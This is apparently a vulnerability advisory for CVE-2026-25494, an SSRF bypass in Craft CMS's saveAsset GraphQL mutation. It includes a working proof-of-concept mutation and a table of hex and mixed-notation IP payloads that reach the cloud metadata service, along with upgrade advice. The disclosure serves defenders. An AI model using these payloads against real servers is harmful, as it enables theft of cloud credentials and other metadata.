CVE-2026-25494
Craft CMS Vulnerable to SSRF in GraphQL Asset Mutation via Alternative IP Notation
描述
I observed a [recent commit](https://github.com/craftcms/cms/commit/9d9b46a9e40cbdfb20d0d933abb546be12ccd3af) intended to mitigate Server-Side Request Forgery (SSRF) vulnerabilities. While the implemented defense mechanisms are an improvement, I have identified two methods to bypass these protections. This report details the first bypass method involving alternative IP notation, while the second method will be submitted in a separate advisory. --- ## Summary The `saveAsset` GraphQL mutation uses `filter_var(..., FILTER_VALIDATE_IP)` to block a specific list of IP addresses. However, alternative IP notations (hexadecimal, mixed) are not recognized by this function, allowing attackers to bypass the blocklist and access cloud metadata services. --- ## Proof of Concept 1. Send the following GraphQL mutation: ```graphql mutation { save_images_Asset(_file: { url: "http://169.254.0xa9fe/latest/meta-data/" filename: "metadata.txt" }) { id } } ``` 2. The IP validation passes (hex notation not recognized as IP) 3. Guzzle resolves `169.254.0xa9fe` to `169.254.169.254` 4. Cloud metadata is fetched and saved ### Alternative Payloads | Payload | Notation | Resolves To | |---------|----------|-------------| | `http://169.254.0xa9fe/` | Mixed (decimal + hex) | 169.254.169.254 | | `http://0xa9.0xfe.0xa9.0xfe/` | Full hex dotted | 169.254.169.254 | | `http://0xa9fea9fe/` | Single hex integer | 169.254.169.254 | --- ## Technical Details **File:** `src/gql/resolvers/mutations/Asset.php` **Root Cause:** `filter_var($hostname, FILTER_VALIDATE_IP)` only recognizes standard dotted-decimal notation. Hex representations bypass this check, but Guzzle still resolves them. ```php // Line 287 - Fails to catch hex notation filter_var($hostname, FILTER_VALIDATE_IP) ```
如何修補 CVE-2026-25494
要修補 CVE-2026-25494,請將受影響套件升級到下列已修補版本。
- —升級至 5.8.22 或更新版本
CVE-2026-25494 正在被利用嗎?
低 — EPSS 為 0.0%,目前沒有觀察到大規模利用活動。